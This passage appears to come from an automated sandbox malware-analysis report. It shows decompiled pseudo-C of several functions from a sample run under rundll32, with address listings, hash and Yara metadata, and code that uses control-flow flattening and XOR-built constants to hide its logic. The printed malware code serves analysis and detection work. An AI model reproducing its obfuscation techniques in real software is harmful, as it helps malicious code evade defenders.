				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E00377FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E00384B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E00386DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E0038D97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E00380E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x393208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E00380B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E0037B74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E00381889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E00379714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E0037F09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E0037E5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E00373DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}





































                                                                                                                                                            0x0037b2d1
                                                                                                                                                            0x0037b2d8
                                                                                                                                                            0x0037b2d9
                                                                                                                                                            0x0037b2da
                                                                                                                                                            0x0037b2df
                                                                                                                                                            0x0037b2e7
                                                                                                                                                            0x0037b2f0
                                                                                                                                                            0x0037b2f2
                                                                                                                                                            0x0037b303
                                                                                                                                                            0x0037b308
                                                                                                                                                            0x0037b30e
                                                                                                                                                            0x0037b316
                                                                                                                                                            0x0037b31e
                                                                                                                                                            0x0037b326
                                                                                                                                                            0x0037b32e
                                                                                                                                                            0x0037b336
                                                                                                                                                            0x0037b33e
                                                                                                                                                            0x0037b346
                                                                                                                                                            0x0037b34e
                                                                                                                                                            0x0037b356
                                                                                                                                                            0x0037b35e
                                                                                                                                                            0x0037b366
                                                                                                                                                            0x0037b36e
                                                                                                                                                            0x0037b376
                                                                                                                                                            0x0037b37e
                                                                                                                                                            0x0037b386
                                                                                                                                                            0x0037b38b
                                                                                                                                                            0x0037b393
                                                                                                                                                            0x0037b39b
                                                                                                                                                            0x0037b3a7
                                                                                                                                                            0x0037b3ac
                                                                                                                                                            0x0037b3b2
                                                                                                                                                            0x0037b3ba
                                                                                                                                                            0x0037b3c7
                                                                                                                                                            0x0037b3ca
                                                                                                                                                            0x0037b3d6
                                                                                                                                                            0x0037b3df
                                                                                                                                                            0x0037b3e0
                                                                                                                                                            0x0037b3e4
                                                                                                                                                            0x0037b3ec
                                                                                                                                                            0x0037b3f4
                                                                                                                                                            0x0037b3fc
                                                                                                                                                            0x0037b401
                                                                                                                                                            0x0037b409
                                                                                                                                                            0x0037b411
                                                                                                                                                            0x0037b419
                                                                                                                                                            0x0037b421
                                                                                                                                                            0x0037b429
                                                                                                                                                            0x0037b431
                                                                                                                                                            0x0037b439
                                                                                                                                                            0x0037b441
                                                                                                                                                            0x0037b449
                                                                                                                                                            0x0037b457
                                                                                                                                                            0x0037b45b
                                                                                                                                                            0x0037b45f
                                                                                                                                                            0x0037b467
                                                                                                                                                            0x0037b46f
                                                                                                                                                            0x0037b477
                                                                                                                                                            0x0037b477
                                                                                                                                                            0x0037b47d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b483
                                                                                                                                                            0x0037b483
                                                                                                                                                            0x0037b56e
                                                                                                                                                            0x0037b56f
                                                                                                                                                            0x0037b572
                                                                                                                                                            0x0037b578
                                                                                                                                                            0x0037b57c
                                                                                                                                                            0x0037b57e
                                                                                                                                                            0x0037b520
                                                                                                                                                            0x0037b520
                                                                                                                                                            0x0037b525
                                                                                                                                                            0x0037b477
                                                                                                                                                            0x0037b477
                                                                                                                                                            0x0037b477
                                                                                                                                                            0x0037b47d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b47d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b6b6
                                                                                                                                                            0x0037b6b6
                                                                                                                                                            0x0037b6b6
                                                                                                                                                            0x0037b6c2
                                                                                                                                                            0x0037b6ce
                                                                                                                                                            0x0037b6ce
                                                                                                                                                            0x0037b584
                                                                                                                                                            0x0037b589
                                                                                                                                                            0x0037b590
                                                                                                                                                            0x0037b597
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b597
                                                                                                                                                            0x0037b48f
                                                                                                                                                            0x0037b546
                                                                                                                                                            0x0037b54b
                                                                                                                                                            0x0037b55b
                                                                                                                                                            0x0037b4e6
                                                                                                                                                            0x0037b4e6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b4e6
                                                                                                                                                            0x0037b54d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b54d
                                                                                                                                                            0x0037b49b
                                                                                                                                                            0x0037b52a
                                                                                                                                                            0x0037b52f
                                                                                                                                                            0x0037b53f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b53f
                                                                                                                                                            0x0037b531
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b531
                                                                                                                                                            0x0037b4a3
                                                                                                                                                            0x0037b510
                                                                                                                                                            0x0037b515
                                                                                                                                                            0x0037b518
                                                                                                                                                            0x0037b51a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b51a
                                                                                                                                                            0x0037b4ab
                                                                                                                                                            0x0037b4df
                                                                                                                                                            0x0037b4e4
                                                                                                                                                            0x0037b4ee
                                                                                                                                                            0x0037b4ee
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b4e4
                                                                                                                                                            0x0037b4af
                                                                                                                                                            0x0037b4c8
                                                                                                                                                            0x0037b4ce
                                                                                                                                                            0x0037b4d5
                                                                                                                                                            0x0037b4d7
                                                                                                                                                            0x0037b4c4
                                                                                                                                                            0x0037b4c4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b4c4
                                                                                                                                                            0x0037b4b7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b4bf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b59f
                                                                                                                                                            0x0037b59f
                                                                                                                                                            0x0037b5a5
                                                                                                                                                            0x0037b698
                                                                                                                                                            0x0037b69d
                                                                                                                                                            0x0037b6af
                                                                                                                                                            0x0037b6b4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b6b4
                                                                                                                                                            0x0037b69f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b69f
                                                                                                                                                            0x0037b5ab
                                                                                                                                                            0x0037b5b1
                                                                                                                                                            0x0037b679
                                                                                                                                                            0x0037b67e
                                                                                                                                                            0x0037b68e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b68e
                                                                                                                                                            0x0037b680
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b680
                                                                                                                                                            0x0037b5b7
                                                                                                                                                            0x0037b5bd
                                                                                                                                                            0x0037b658
                                                                                                                                                            0x0037b65d
                                                                                                                                                            0x0037b66f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b66f
                                                                                                                                                            0x0037b65f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b65f
                                                                                                                                                            0x0037b5c3
                                                                                                                                                            0x0037b5c9
                                                                                                                                                            0x0037b639
                                                                                                                                                            0x0037b63e
                                                                                                                                                            0x0037b64e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b64e
                                                                                                                                                            0x0037b640
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b640
                                                                                                                                                            0x0037b5cb
                                                                                                                                                            0x0037b5d1
                                                                                                                                                            0x0037b61f
                                                                                                                                                            0x0037b62a
                                                                                                                                                            0x0037b632
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b632
                                                                                                                                                            0x0037b5d3
                                                                                                                                                            0x0037b5d9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b5f9
                                                                                                                                                            0x0037b5fe
                                                                                                                                                            0x0037b601
                                                                                                                                                            0x0037b601

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: V$h5$kn=
                                                                                                                                                            • API String ID: 0-2568719763
                                                                                                                                                            • Opcode ID: aacf19be9e4207d32f4d276c3205fb8bf5cbacce37d65fab8ed6cd949a1a81f2
                                                                                                                                                            • Instruction ID: a5cff1b3e6252597811945ef06705888728b00cfde3726200fedbc8e45d41c89
                                                                                                                                                            • Opcode Fuzzy Hash: aacf19be9e4207d32f4d276c3205fb8bf5cbacce37d65fab8ed6cd949a1a81f2
                                                                                                                                                            • Instruction Fuzzy Hash: A3A18771108340CBC73ADF66D49562BFBF5FB85318F14892EF29A86261D7399A09CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00384116 Relevance: 4.0, Strings: 3, Instructions: 223COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E00384116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E00378F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
									_t222 = E00379350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E00381E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E0038ABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E0038DA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E0038C1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}











































                                                                                                                                                            0x0038411c
                                                                                                                                                            0x00384126
                                                                                                                                                            0x0038412e
                                                                                                                                                            0x00384136
                                                                                                                                                            0x0038413e
                                                                                                                                                            0x00384146
                                                                                                                                                            0x0038414e
                                                                                                                                                            0x00384156
                                                                                                                                                            0x0038415e
                                                                                                                                                            0x00384166
                                                                                                                                                            0x0038416e
                                                                                                                                                            0x00384176
                                                                                                                                                            0x0038417e
                                                                                                                                                            0x00384183
                                                                                                                                                            0x0038418b
                                                                                                                                                            0x00384193
                                                                                                                                                            0x003841a4
                                                                                                                                                            0x003841a8
                                                                                                                                                            0x003841aa
                                                                                                                                                            0x003841af
                                                                                                                                                            0x003841bb
                                                                                                                                                            0x003841be
                                                                                                                                                            0x003841c2
                                                                                                                                                            0x003841ca
                                                                                                                                                            0x003841da
                                                                                                                                                            0x003841de
                                                                                                                                                            0x003841e7
                                                                                                                                                            0x003841ec
                                                                                                                                                            0x003841f2
                                                                                                                                                            0x003841fa
                                                                                                                                                            0x00384202
                                                                                                                                                            0x00384207
                                                                                                                                                            0x0038420f
                                                                                                                                                            0x00384214
                                                                                                                                                            0x0038421c
                                                                                                                                                            0x00384224
                                                                                                                                                            0x00384230
                                                                                                                                                            0x00384233
                                                                                                                                                            0x00384237
                                                                                                                                                            0x0038423f
                                                                                                                                                            0x00384247
                                                                                                                                                            0x0038424f
                                                                                                                                                            0x00384254
                                                                                                                                                            0x0038425c
                                                                                                                                                            0x00384264
                                                                                                                                                            0x0038426c
                                                                                                                                                            0x00384274
                                                                                                                                                            0x00384279
                                                                                                                                                            0x00384281
                                                                                                                                                            0x00384289
                                                                                                                                                            0x0038428e
                                                                                                                                                            0x00384296
                                                                                                                                                            0x0038429b
                                                                                                                                                            0x003842a3
                                                                                                                                                            0x003842ab
                                                                                                                                                            0x003842b3
                                                                                                                                                            0x003842bb
                                                                                                                                                            0x003842c0
                                                                                                                                                            0x003842c8
                                                                                                                                                            0x003842d0
                                                                                                                                                            0x003842d8
                                                                                                                                                            0x003842dc
                                                                                                                                                            0x003842e4
                                                                                                                                                            0x003842f4
                                                                                                                                                            0x003842f9
                                                                                                                                                            0x003842ff
                                                                                                                                                            0x0038430c
                                                                                                                                                            0x00384314
                                                                                                                                                            0x0038431c
                                                                                                                                                            0x00384324
                                                                                                                                                            0x0038432c
                                                                                                                                                            0x00384334
                                                                                                                                                            0x00384339
                                                                                                                                                            0x00384341
                                                                                                                                                            0x00384349
                                                                                                                                                            0x00384355
                                                                                                                                                            0x0038435a
                                                                                                                                                            0x00384360
                                                                                                                                                            0x00384368
                                                                                                                                                            0x00384370
                                                                                                                                                            0x00384378
                                                                                                                                                            0x00384380
                                                                                                                                                            0x00384388
                                                                                                                                                            0x00384390
                                                                                                                                                            0x00384398
                                                                                                                                                            0x003843a0
                                                                                                                                                            0x003843a8
                                                                                                                                                            0x003843b0
                                                                                                                                                            0x003843b8
                                                                                                                                                            0x003843c0
                                                                                                                                                            0x003843cc
                                                                                                                                                            0x003843cf
                                                                                                                                                            0x003843d3
                                                                                                                                                            0x003843d7
                                                                                                                                                            0x003843df
                                                                                                                                                            0x003843df
                                                                                                                                                            0x003843f1
                                                                                                                                                            0x003844da
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003843f7
                                                                                                                                                            0x003843f9
                                                                                                                                                            0x003844b8
                                                                                                                                                            0x003844c1
                                                                                                                                                            0x003844c6
                                                                                                                                                            0x003844c8
                                                                                                                                                            0x003844cb
                                                                                                                                                            0x003844ce
                                                                                                                                                            0x003844d0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003844d0
                                                                                                                                                            0x003843ff
                                                                                                                                                            0x00384405
                                                                                                                                                            0x0038445e
                                                                                                                                                            0x0038446a
                                                                                                                                                            0x0038447b
                                                                                                                                                            0x0038447f
                                                                                                                                                            0x00384485
                                                                                                                                                            0x00384489
                                                                                                                                                            0x0038448e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384407
                                                                                                                                                            0x0038440d
                                                                                                                                                            0x0038450a
                                                                                                                                                            0x00384513
                                                                                                                                                            0x0038451e
                                                                                                                                                            0x00384525
                                                                                                                                                            0x00384527
                                                                                                                                                            0x00384529
                                                                                                                                                            0x0038452f
                                                                                                                                                            0x00384531
                                                                                                                                                            0x00384531
                                                                                                                                                            0x0038452b
                                                                                                                                                            0x0038452b
                                                                                                                                                            0x0038452d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038452d
                                                                                                                                                            0x00384529
                                                                                                                                                            0x00384413
                                                                                                                                                            0x00384413
                                                                                                                                                            0x00384419
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038441f
                                                                                                                                                            0x00384430
                                                                                                                                                            0x00384434
                                                                                                                                                            0x00384438
                                                                                                                                                            0x0038443d
                                                                                                                                                            0x00384442
                                                                                                                                                            0x00384448
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00384448
                                                                                                                                                            0x00384442
                                                                                                                                                            0x00384419
                                                                                                                                                            0x0038440d
                                                                                                                                                            0x00384405
                                                                                                                                                            0x003843f9
                                                                                                                                                            0x00384535
                                                                                                                                                            0x0038453e
                                                                                                                                                            0x0038453e
                                                                                                                                                            0x003844f1
                                                                                                                                                            0x003844f6
                                                                                                                                                            0x003844f7
                                                                                                                                                            0x003844fc
                                                                                                                                                            0x003844fc
                                                                                                                                                            0x003844fc
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,a$`2$?
                                                                                                                                                            • API String ID: 0-2087061617
                                                                                                                                                            • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                                            • Instruction ID: f4af7eabefa371e893d3965cb6767bf59d4ae73b679af89ec3aa3a85b3fea595
                                                                                                                                                            • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                                                            • Instruction Fuzzy Hash: A7A130725083419FC369DF65C88A40FFBF1BBC5708F008A5DF59A96260D3B58A09CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003759F2 Relevance: 4.0, Strings: 3, Instructions: 202COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003759F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
